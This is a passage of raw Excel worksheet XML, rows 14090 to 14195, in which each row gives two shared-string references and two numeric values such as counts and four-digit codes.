      <c r="A14090" t="s">
        <v>16231</v>
      </c>
      <c r="B14090" t="s">
        <v>16216</v>
      </c>
      <c r="C14090">
        <v>5</v>
      </c>
      <c r="D14090">
        <v>1980</v>
      </c>
    </row>
    <row r="14091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14091" t="s">
        <v>16228</v>
      </c>
      <c r="B14091" t="s">
        <v>16217</v>
      </c>
      <c r="C14091">
        <v>5</v>
      </c>
      <c r="D14091">
        <v>1980</v>
      </c>
    </row>
    <row r="14092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14092" t="s">
        <v>16231</v>
      </c>
      <c r="B14092" t="s">
        <v>16218</v>
      </c>
      <c r="C14092">
        <v>3</v>
      </c>
      <c r="D14092">
        <v>1980</v>
      </c>
    </row>
    <row r="14093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14093" t="s">
        <v>16229</v>
      </c>
      <c r="B14093" t="s">
        <v>16219</v>
      </c>
      <c r="C14093">
        <v>0</v>
      </c>
      <c r="D14093">
        <v>1980</v>
      </c>
    </row>
    <row r="14094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14094" t="s">
        <v>16230</v>
      </c>
      <c r="B14094" t="s">
        <v>16220</v>
      </c>
      <c r="C14094">
        <v>0</v>
      </c>
      <c r="D14094">
        <v>1980</v>
      </c>
    </row>
    <row r="14095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14095" t="s">
        <v>16229</v>
      </c>
      <c r="B14095" t="s">
        <v>16221</v>
      </c>
      <c r="C14095">
        <v>30</v>
      </c>
      <c r="D14095">
        <v>1980</v>
      </c>
    </row>
    <row r="14096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14096" t="s">
        <v>16230</v>
      </c>
      <c r="B14096" t="s">
        <v>16222</v>
      </c>
      <c r="C14096">
        <v>20</v>
      </c>
      <c r="D14096">
        <v>1980</v>
      </c>
    </row>
    <row r="14097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14097" t="s">
        <v>16223</v>
      </c>
      <c r="B14097" t="s">
        <v>16223</v>
      </c>
      <c r="C14097">
        <v>26</v>
      </c>
      <c r="D14097">
        <v>1980</v>
      </c>
    </row>
    <row r="14098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14098" t="s">
        <v>16224</v>
      </c>
      <c r="B14098" t="s">
        <v>16224</v>
      </c>
      <c r="C14098">
        <v>1</v>
      </c>
      <c r="D14098">
        <v>1980</v>
      </c>
    </row>
    <row r="14099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14099" t="s">
        <v>16228</v>
      </c>
      <c r="B14099" t="s">
        <v>16211</v>
      </c>
      <c r="C14099">
        <v>0</v>
      </c>
      <c r="D14099">
        <v>1058</v>
      </c>
    </row>
    <row r="14100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14100" t="s">
        <v>16231</v>
      </c>
      <c r="B14100" t="s">
        <v>16212</v>
      </c>
      <c r="C14100">
        <v>0</v>
      </c>
      <c r="D14100">
        <v>1058</v>
      </c>
    </row>
    <row r="14101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14101" t="s">
        <v>16228</v>
      </c>
      <c r="B14101" t="s">
        <v>16213</v>
      </c>
      <c r="C14101">
        <v>0</v>
      </c>
      <c r="D14101">
        <v>1058</v>
      </c>
    </row>
    <row r="14102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14102" t="s">
        <v>16231</v>
      </c>
      <c r="B14102" t="s">
        <v>16214</v>
      </c>
      <c r="C14102">
        <v>0</v>
      </c>
      <c r="D14102">
        <v>1058</v>
      </c>
    </row>
    <row r="14103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14103" t="s">
        <v>16228</v>
      </c>
      <c r="B14103" t="s">
        <v>16215</v>
      </c>
      <c r="C14103">
        <v>0</v>
      </c>
      <c r="D14103">
        <v>1058</v>
      </c>
    </row>
    <row r="14104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14104" t="s">
        <v>16231</v>
      </c>
      <c r="B14104" t="s">
        <v>16216</v>
      </c>
      <c r="C14104">
        <v>1</v>
      </c>
      <c r="D14104">
        <v>1058</v>
      </c>
    </row>
    <row r="14105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14105" t="s">
        <v>16228</v>
      </c>
      <c r="B14105" t="s">
        <v>16217</v>
      </c>
      <c r="C14105">
        <v>0</v>
      </c>
      <c r="D14105">
        <v>1058</v>
      </c>
    </row>
    <row r="14106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14106" t="s">
        <v>16231</v>
      </c>
      <c r="B14106" t="s">
        <v>16218</v>
      </c>
      <c r="C14106">
        <v>6</v>
      </c>
      <c r="D14106">
        <v>1058</v>
      </c>
    </row>
    <row r="14107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14107" t="s">
        <v>16229</v>
      </c>
      <c r="B14107" t="s">
        <v>16219</v>
      </c>
      <c r="C14107">
        <v>1</v>
      </c>
      <c r="D14107">
        <v>1058</v>
      </c>
    </row>
    <row r="14108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14108" t="s">
        <v>16230</v>
      </c>
      <c r="B14108" t="s">
        <v>16220</v>
      </c>
      <c r="C14108">
        <v>0</v>
      </c>
      <c r="D14108">
        <v>1058</v>
      </c>
    </row>
    <row r="14109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14109" t="s">
        <v>16229</v>
      </c>
      <c r="B14109" t="s">
        <v>16221</v>
      </c>
      <c r="C14109">
        <v>3</v>
      </c>
      <c r="D14109">
        <v>1058</v>
      </c>
    </row>
    <row r="14110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14110" t="s">
        <v>16230</v>
      </c>
      <c r="B14110" t="s">
        <v>16222</v>
      </c>
      <c r="C14110">
        <v>0</v>
      </c>
      <c r="D14110">
        <v>1058</v>
      </c>
    </row>
    <row r="14111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14111" t="s">
        <v>16223</v>
      </c>
      <c r="B14111" t="s">
        <v>16223</v>
      </c>
      <c r="C14111">
        <v>14</v>
      </c>
      <c r="D14111">
        <v>1058</v>
      </c>
    </row>
    <row r="14112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14112" t="s">
        <v>16224</v>
      </c>
      <c r="B14112" t="s">
        <v>16224</v>
      </c>
      <c r="C14112">
        <v>2</v>
      </c>
      <c r="D14112">
        <v>1058</v>
      </c>
    </row>
    <row r="14113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14113" t="s">
        <v>16228</v>
      </c>
      <c r="B14113" t="s">
        <v>16211</v>
      </c>
      <c r="C14113">
        <v>0</v>
      </c>
      <c r="D14113">
        <v>2821</v>
      </c>
    </row>
    <row r="14114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14114" t="s">
        <v>16231</v>
      </c>
      <c r="B14114" t="s">
        <v>16212</v>
      </c>
      <c r="C14114">
        <v>0</v>
      </c>
      <c r="D14114">
        <v>2821</v>
      </c>
    </row>
    <row r="14115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14115" t="s">
        <v>16228</v>
      </c>
      <c r="B14115" t="s">
        <v>16213</v>
      </c>
      <c r="C14115">
        <v>0</v>
      </c>
      <c r="D14115">
        <v>2821</v>
      </c>
    </row>
    <row r="14116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14116" t="s">
        <v>16231</v>
      </c>
      <c r="B14116" t="s">
        <v>16214</v>
      </c>
      <c r="C14116">
        <v>0</v>
      </c>
      <c r="D14116">
        <v>2821</v>
      </c>
    </row>
    <row r="14117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14117" t="s">
        <v>16228</v>
      </c>
      <c r="B14117" t="s">
        <v>16215</v>
      </c>
      <c r="C14117">
        <v>2</v>
      </c>
      <c r="D14117">
        <v>2821</v>
      </c>
    </row>
    <row r="14118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14118" t="s">
        <v>16231</v>
      </c>
      <c r="B14118" t="s">
        <v>16216</v>
      </c>
      <c r="C14118">
        <v>0</v>
      </c>
      <c r="D14118">
        <v>2821</v>
      </c>
    </row>
    <row r="14119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14119" t="s">
        <v>16228</v>
      </c>
      <c r="B14119" t="s">
        <v>16217</v>
      </c>
      <c r="C14119">
        <v>6</v>
      </c>
      <c r="D14119">
        <v>2821</v>
      </c>
    </row>
    <row r="14120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14120" t="s">
        <v>16231</v>
      </c>
      <c r="B14120" t="s">
        <v>16218</v>
      </c>
      <c r="C14120">
        <v>0</v>
      </c>
      <c r="D14120">
        <v>2821</v>
      </c>
    </row>
    <row r="14121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14121" t="s">
        <v>16229</v>
      </c>
      <c r="B14121" t="s">
        <v>16219</v>
      </c>
      <c r="C14121">
        <v>0</v>
      </c>
      <c r="D14121">
        <v>2821</v>
      </c>
    </row>
    <row r="14122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14122" t="s">
        <v>16230</v>
      </c>
      <c r="B14122" t="s">
        <v>16220</v>
      </c>
      <c r="C14122">
        <v>0</v>
      </c>
      <c r="D14122">
        <v>2821</v>
      </c>
    </row>
    <row r="14123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14123" t="s">
        <v>16229</v>
      </c>
      <c r="B14123" t="s">
        <v>16221</v>
      </c>
      <c r="C14123">
        <v>0</v>
      </c>
      <c r="D14123">
        <v>2821</v>
      </c>
    </row>
    <row r="14124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14124" t="s">
        <v>16230</v>
      </c>
      <c r="B14124" t="s">
        <v>16222</v>
      </c>
      <c r="C14124">
        <v>0</v>
      </c>
      <c r="D14124">
        <v>2821</v>
      </c>
    </row>
    <row r="14125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14125" t="s">
        <v>16223</v>
      </c>
      <c r="B14125" t="s">
        <v>16223</v>
      </c>
      <c r="C14125">
        <v>24</v>
      </c>
      <c r="D14125">
        <v>2821</v>
      </c>
    </row>
    <row r="14126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14126" t="s">
        <v>16224</v>
      </c>
      <c r="B14126" t="s">
        <v>16224</v>
      </c>
      <c r="C14126">
        <v>2</v>
      </c>
      <c r="D14126">
        <v>2821</v>
      </c>
    </row>
    <row r="14127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14127" t="s">
        <v>16228</v>
      </c>
      <c r="B14127" t="s">
        <v>16211</v>
      </c>
      <c r="C14127">
        <v>0</v>
      </c>
      <c r="D14127">
        <v>834</v>
      </c>
    </row>
    <row r="14128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14128" t="s">
        <v>16231</v>
      </c>
      <c r="B14128" t="s">
        <v>16212</v>
      </c>
      <c r="C14128">
        <v>0</v>
      </c>
      <c r="D14128">
        <v>834</v>
      </c>
    </row>
    <row r="14129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14129" t="s">
        <v>16228</v>
      </c>
      <c r="B14129" t="s">
        <v>16213</v>
      </c>
      <c r="C14129">
        <v>0</v>
      </c>
      <c r="D14129">
        <v>834</v>
      </c>
    </row>
    <row r="14130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14130" t="s">
        <v>16231</v>
      </c>
      <c r="B14130" t="s">
        <v>16214</v>
      </c>
      <c r="C14130">
        <v>0</v>
      </c>
      <c r="D14130">
        <v>834</v>
      </c>
    </row>
    <row r="14131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14131" t="s">
        <v>16228</v>
      </c>
      <c r="B14131" t="s">
        <v>16215</v>
      </c>
      <c r="C14131">
        <v>0</v>
      </c>
      <c r="D14131">
        <v>834</v>
      </c>
    </row>
    <row r="14132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14132" t="s">
        <v>16231</v>
      </c>
      <c r="B14132" t="s">
        <v>16216</v>
      </c>
      <c r="C14132">
        <v>0</v>
      </c>
      <c r="D14132">
        <v>834</v>
      </c>
    </row>
    <row r="14133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14133" t="s">
        <v>16228</v>
      </c>
      <c r="B14133" t="s">
        <v>16217</v>
      </c>
      <c r="C14133">
        <v>0</v>
      </c>
      <c r="D14133">
        <v>834</v>
      </c>
    </row>
    <row r="14134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14134" t="s">
        <v>16231</v>
      </c>
      <c r="B14134" t="s">
        <v>16218</v>
      </c>
      <c r="C14134">
        <v>0</v>
      </c>
      <c r="D14134">
        <v>834</v>
      </c>
    </row>
    <row r="14135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14135" t="s">
        <v>16229</v>
      </c>
      <c r="B14135" t="s">
        <v>16219</v>
      </c>
      <c r="C14135">
        <v>0</v>
      </c>
      <c r="D14135">
        <v>834</v>
      </c>
    </row>
    <row r="14136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14136" t="s">
        <v>16230</v>
      </c>
      <c r="B14136" t="s">
        <v>16220</v>
      </c>
      <c r="C14136">
        <v>0</v>
      </c>
      <c r="D14136">
        <v>834</v>
      </c>
    </row>
    <row r="14137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14137" t="s">
        <v>16229</v>
      </c>
      <c r="B14137" t="s">
        <v>16221</v>
      </c>
      <c r="C14137">
        <v>0</v>
      </c>
      <c r="D14137">
        <v>834</v>
      </c>
    </row>
    <row r="14138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14138" t="s">
        <v>16230</v>
      </c>
      <c r="B14138" t="s">
        <v>16222</v>
      </c>
      <c r="C14138">
        <v>0</v>
      </c>
      <c r="D14138">
        <v>834</v>
      </c>
    </row>
    <row r="14139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14139" t="s">
        <v>16223</v>
      </c>
      <c r="B14139" t="s">
        <v>16223</v>
      </c>
      <c r="C14139">
        <v>0</v>
      </c>
      <c r="D14139">
        <v>834</v>
      </c>
    </row>
    <row r="14140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14140" t="s">
        <v>16224</v>
      </c>
      <c r="B14140" t="s">
        <v>16224</v>
      </c>
      <c r="C14140">
        <v>0</v>
      </c>
      <c r="D14140">
        <v>834</v>
      </c>
    </row>
    <row r="14141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14141" t="s">
        <v>16228</v>
      </c>
      <c r="B14141" t="s">
        <v>16213</v>
      </c>
      <c r="C14141">
        <v>1</v>
      </c>
      <c r="D14141">
        <v>834</v>
      </c>
    </row>
    <row r="14142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14142" t="s">
        <v>16231</v>
      </c>
      <c r="B14142" t="s">
        <v>16214</v>
      </c>
      <c r="C14142">
        <v>9</v>
      </c>
      <c r="D14142">
        <v>834</v>
      </c>
    </row>
    <row r="14143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14143" t="s">
        <v>16223</v>
      </c>
      <c r="B14143" t="s">
        <v>16223</v>
      </c>
      <c r="C14143">
        <v>6</v>
      </c>
      <c r="D14143">
        <v>1033</v>
      </c>
    </row>
    <row r="14144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14144" t="s">
        <v>16228</v>
      </c>
      <c r="B14144" t="s">
        <v>16211</v>
      </c>
      <c r="C14144">
        <v>0</v>
      </c>
      <c r="D14144">
        <v>1072</v>
      </c>
    </row>
    <row r="14145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14145" t="s">
        <v>16231</v>
      </c>
      <c r="B14145" t="s">
        <v>16212</v>
      </c>
      <c r="C14145">
        <v>0</v>
      </c>
      <c r="D14145">
        <v>1072</v>
      </c>
    </row>
    <row r="14146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14146" t="s">
        <v>16228</v>
      </c>
      <c r="B14146" t="s">
        <v>16213</v>
      </c>
      <c r="C14146">
        <v>0</v>
      </c>
      <c r="D14146">
        <v>1072</v>
      </c>
    </row>
    <row r="14147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14147" t="s">
        <v>16231</v>
      </c>
      <c r="B14147" t="s">
        <v>16214</v>
      </c>
      <c r="C14147">
        <v>0</v>
      </c>
      <c r="D14147">
        <v>1072</v>
      </c>
    </row>
    <row r="14148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14148" t="s">
        <v>16228</v>
      </c>
      <c r="B14148" t="s">
        <v>16215</v>
      </c>
      <c r="C14148">
        <v>1</v>
      </c>
      <c r="D14148">
        <v>1072</v>
      </c>
    </row>
    <row r="14149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14149" t="s">
        <v>16231</v>
      </c>
      <c r="B14149" t="s">
        <v>16216</v>
      </c>
      <c r="C14149">
        <v>2</v>
      </c>
      <c r="D14149">
        <v>1072</v>
      </c>
    </row>
    <row r="14150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14150" t="s">
        <v>16228</v>
      </c>
      <c r="B14150" t="s">
        <v>16217</v>
      </c>
      <c r="C14150">
        <v>3</v>
      </c>
      <c r="D14150">
        <v>1072</v>
      </c>
    </row>
    <row r="14151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14151" t="s">
        <v>16231</v>
      </c>
      <c r="B14151" t="s">
        <v>16218</v>
      </c>
      <c r="C14151">
        <v>5</v>
      </c>
      <c r="D14151">
        <v>1072</v>
      </c>
    </row>
    <row r="14152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14152" t="s">
        <v>16229</v>
      </c>
      <c r="B14152" t="s">
        <v>16219</v>
      </c>
      <c r="C14152">
        <v>3</v>
      </c>
      <c r="D14152">
        <v>1072</v>
      </c>
    </row>
    <row r="14153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14153" t="s">
        <v>16230</v>
      </c>
      <c r="B14153" t="s">
        <v>16220</v>
      </c>
      <c r="C14153">
        <v>5</v>
      </c>
      <c r="D14153">
        <v>1072</v>
      </c>
    </row>
    <row r="14154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14154" t="s">
        <v>16229</v>
      </c>
      <c r="B14154" t="s">
        <v>16221</v>
      </c>
      <c r="C14154">
        <v>5</v>
      </c>
      <c r="D14154">
        <v>1072</v>
      </c>
    </row>
    <row r="14155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14155" t="s">
        <v>16230</v>
      </c>
      <c r="B14155" t="s">
        <v>16222</v>
      </c>
      <c r="C14155">
        <v>9</v>
      </c>
      <c r="D14155">
        <v>1072</v>
      </c>
    </row>
    <row r="14156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14156" t="s">
        <v>16223</v>
      </c>
      <c r="B14156" t="s">
        <v>16223</v>
      </c>
      <c r="C14156">
        <v>6</v>
      </c>
      <c r="D14156">
        <v>1072</v>
      </c>
    </row>
    <row r="14157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14157" t="s">
        <v>16224</v>
      </c>
      <c r="B14157" t="s">
        <v>16224</v>
      </c>
      <c r="C14157">
        <v>1</v>
      </c>
      <c r="D14157">
        <v>1072</v>
      </c>
    </row>
    <row r="14158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14158" t="s">
        <v>16228</v>
      </c>
      <c r="B14158" t="s">
        <v>16211</v>
      </c>
      <c r="C14158">
        <v>1</v>
      </c>
      <c r="D14158">
        <v>834</v>
      </c>
    </row>
    <row r="14159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14159" t="s">
        <v>16228</v>
      </c>
      <c r="B14159" t="s">
        <v>16211</v>
      </c>
      <c r="C14159">
        <v>0</v>
      </c>
      <c r="D14159">
        <v>527</v>
      </c>
    </row>
    <row r="14160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14160" t="s">
        <v>16231</v>
      </c>
      <c r="B14160" t="s">
        <v>16212</v>
      </c>
      <c r="C14160">
        <v>0</v>
      </c>
      <c r="D14160">
        <v>527</v>
      </c>
    </row>
    <row r="14161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14161" t="s">
        <v>16228</v>
      </c>
      <c r="B14161" t="s">
        <v>16213</v>
      </c>
      <c r="C14161">
        <v>0</v>
      </c>
      <c r="D14161">
        <v>527</v>
      </c>
    </row>
    <row r="14162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14162" t="s">
        <v>16231</v>
      </c>
      <c r="B14162" t="s">
        <v>16214</v>
      </c>
      <c r="C14162">
        <v>0</v>
      </c>
      <c r="D14162">
        <v>527</v>
      </c>
    </row>
    <row r="14163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14163" t="s">
        <v>16228</v>
      </c>
      <c r="B14163" t="s">
        <v>16215</v>
      </c>
      <c r="C14163">
        <v>6</v>
      </c>
      <c r="D14163">
        <v>527</v>
      </c>
    </row>
    <row r="14164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14164" t="s">
        <v>16231</v>
      </c>
      <c r="B14164" t="s">
        <v>16216</v>
      </c>
      <c r="C14164">
        <v>2</v>
      </c>
      <c r="D14164">
        <v>527</v>
      </c>
    </row>
    <row r="14165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14165" t="s">
        <v>16228</v>
      </c>
      <c r="B14165" t="s">
        <v>16217</v>
      </c>
      <c r="C14165">
        <v>0</v>
      </c>
      <c r="D14165">
        <v>527</v>
      </c>
    </row>
    <row r="14166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14166" t="s">
        <v>16231</v>
      </c>
      <c r="B14166" t="s">
        <v>16218</v>
      </c>
      <c r="C14166">
        <v>0</v>
      </c>
      <c r="D14166">
        <v>527</v>
      </c>
    </row>
    <row r="14167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14167" t="s">
        <v>16229</v>
      </c>
      <c r="B14167" t="s">
        <v>16219</v>
      </c>
      <c r="C14167">
        <v>0</v>
      </c>
      <c r="D14167">
        <v>527</v>
      </c>
    </row>
    <row r="14168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14168" t="s">
        <v>16230</v>
      </c>
      <c r="B14168" t="s">
        <v>16220</v>
      </c>
      <c r="C14168">
        <v>0</v>
      </c>
      <c r="D14168">
        <v>527</v>
      </c>
    </row>
    <row r="14169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14169" t="s">
        <v>16229</v>
      </c>
      <c r="B14169" t="s">
        <v>16221</v>
      </c>
      <c r="C14169">
        <v>0</v>
      </c>
      <c r="D14169">
        <v>527</v>
      </c>
    </row>
    <row r="14170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14170" t="s">
        <v>16230</v>
      </c>
      <c r="B14170" t="s">
        <v>16222</v>
      </c>
      <c r="C14170">
        <v>0</v>
      </c>
      <c r="D14170">
        <v>527</v>
      </c>
    </row>
    <row r="14171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14171" t="s">
        <v>16223</v>
      </c>
      <c r="B14171" t="s">
        <v>16223</v>
      </c>
      <c r="C14171">
        <v>0</v>
      </c>
      <c r="D14171">
        <v>527</v>
      </c>
    </row>
    <row r="14172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14172" t="s">
        <v>16224</v>
      </c>
      <c r="B14172" t="s">
        <v>16224</v>
      </c>
      <c r="C14172">
        <v>0</v>
      </c>
      <c r="D14172">
        <v>527</v>
      </c>
    </row>
    <row r="14173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14173" t="s">
        <v>16228</v>
      </c>
      <c r="B14173" t="s">
        <v>16211</v>
      </c>
      <c r="C14173">
        <v>1</v>
      </c>
      <c r="D14173">
        <v>2086</v>
      </c>
    </row>
    <row r="14174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14174" t="s">
        <v>16231</v>
      </c>
      <c r="B14174" t="s">
        <v>16212</v>
      </c>
      <c r="C14174">
        <v>0</v>
      </c>
      <c r="D14174">
        <v>2086</v>
      </c>
    </row>
    <row r="14175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14175" t="s">
        <v>16228</v>
      </c>
      <c r="B14175" t="s">
        <v>16213</v>
      </c>
      <c r="C14175">
        <v>13</v>
      </c>
      <c r="D14175">
        <v>2086</v>
      </c>
    </row>
    <row r="14176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14176" t="s">
        <v>16231</v>
      </c>
      <c r="B14176" t="s">
        <v>16214</v>
      </c>
      <c r="C14176">
        <v>1</v>
      </c>
      <c r="D14176">
        <v>2086</v>
      </c>
    </row>
    <row r="14177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14177" t="s">
        <v>16228</v>
      </c>
      <c r="B14177" t="s">
        <v>16215</v>
      </c>
      <c r="C14177">
        <v>20</v>
      </c>
      <c r="D14177">
        <v>2086</v>
      </c>
    </row>
    <row r="14178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14178" t="s">
        <v>16231</v>
      </c>
      <c r="B14178" t="s">
        <v>16216</v>
      </c>
      <c r="C14178">
        <v>0</v>
      </c>
      <c r="D14178">
        <v>2086</v>
      </c>
    </row>
    <row r="14179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14179" t="s">
        <v>16228</v>
      </c>
      <c r="B14179" t="s">
        <v>16217</v>
      </c>
      <c r="C14179">
        <v>13</v>
      </c>
      <c r="D14179">
        <v>2086</v>
      </c>
    </row>
    <row r="14180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14180" t="s">
        <v>16231</v>
      </c>
      <c r="B14180" t="s">
        <v>16218</v>
      </c>
      <c r="C14180">
        <v>1</v>
      </c>
      <c r="D14180">
        <v>2086</v>
      </c>
    </row>
    <row r="14181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14181" t="s">
        <v>16229</v>
      </c>
      <c r="B14181" t="s">
        <v>16219</v>
      </c>
      <c r="C14181">
        <v>0</v>
      </c>
      <c r="D14181">
        <v>2086</v>
      </c>
    </row>
    <row r="14182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14182" t="s">
        <v>16230</v>
      </c>
      <c r="B14182" t="s">
        <v>16220</v>
      </c>
      <c r="C14182">
        <v>0</v>
      </c>
      <c r="D14182">
        <v>2086</v>
      </c>
    </row>
    <row r="14183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14183" t="s">
        <v>16229</v>
      </c>
      <c r="B14183" t="s">
        <v>16221</v>
      </c>
      <c r="C14183">
        <v>0</v>
      </c>
      <c r="D14183">
        <v>2086</v>
      </c>
    </row>
    <row r="14184" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14184" t="s">
        <v>16230</v>
      </c>
      <c r="B14184" t="s">
        <v>16222</v>
      </c>
      <c r="C14184">
        <v>0</v>
      </c>
      <c r="D14184">
        <v>2086</v>
      </c>
    </row>
    <row r="14185" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14185" t="s">
        <v>16223</v>
      </c>
      <c r="B14185" t="s">
        <v>16223</v>
      </c>
      <c r="C14185">
        <v>24</v>
      </c>
      <c r="D14185">
        <v>2086</v>
      </c>
    </row>
    <row r="14186" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14186" t="s">
        <v>16224</v>
      </c>
      <c r="B14186" t="s">
        <v>16224</v>
      </c>
      <c r="C14186">
        <v>0</v>
      </c>
      <c r="D14186">
        <v>2086</v>
      </c>
    </row>
    <row r="14187" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14187" t="s">
        <v>16228</v>
      </c>
      <c r="B14187" t="s">
        <v>16211</v>
      </c>
      <c r="C14187">
        <v>0</v>
      </c>
      <c r="D14187">
        <v>1385</v>
      </c>
    </row>
    <row r="14188" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14188" t="s">
        <v>16231</v>
      </c>
      <c r="B14188" t="s">
        <v>16212</v>
      </c>
      <c r="C14188">
        <v>0</v>
      </c>
      <c r="D14188">
        <v>1385</v>
      </c>
    </row>
    <row r="14189" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14189" t="s">
        <v>16228</v>
      </c>
      <c r="B14189" t="s">
        <v>16213</v>
      </c>
      <c r="C14189">
        <v>0</v>
      </c>
      <c r="D14189">
        <v>1385</v>
      </c>
    </row>
    <row r="14190" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14190" t="s">
        <v>16231</v>
      </c>
      <c r="B14190" t="s">
        <v>16214</v>
      </c>
      <c r="C14190">
        <v>0</v>
      </c>
      <c r="D14190">
        <v>1385</v>
      </c>
    </row>
    <row r="14191" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14191" t="s">
        <v>16228</v>
      </c>
      <c r="B14191" t="s">
        <v>16215</v>
      </c>
      <c r="C14191">
        <v>4</v>
      </c>
      <c r="D14191">
        <v>1385</v>
      </c>
    </row>
    <row r="14192" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14192" t="s">
        <v>16231</v>
      </c>
      <c r="B14192" t="s">
        <v>16216</v>
      </c>
      <c r="C14192">
        <v>0</v>
      </c>
      <c r="D14192">
        <v>1385</v>
      </c>
    </row>
    <row r="14193" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14193" t="s">
        <v>16228</v>
      </c>
      <c r="B14193" t="s">
        <v>16217</v>
      </c>
      <c r="C14193">
        <v>10</v>
      </c>
      <c r="D14193">
        <v>1385</v>
      </c>
    </row>
    <row r="14194" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14194" t="s">
        <v>16231</v>
      </c>
      <c r="B14194" t="s">
        <v>16218</v>
      </c>
      <c r="C14194">
        <v>0</v>
      </c>
      <c r="D14194">
        <v>1385</v>
      </c>
    </row>
    <row r="14195" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14195" t="s">
